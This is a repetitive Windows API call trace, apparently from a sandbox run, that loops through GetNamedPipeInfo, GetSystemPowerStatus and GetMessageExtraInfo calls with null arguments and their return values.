	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.633] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.633] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.633] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.634] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.634] GetMessageExtraInfo () returned 0x0
	[0171.634] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.635] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.635] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.635] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.636] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.636] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.636] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.637] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.637] GetMessageExtraInfo () returned 0x0
	[0171.637] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
	[0171.638] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.638] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.638] GetMessageExtraInfo () returned 0x0
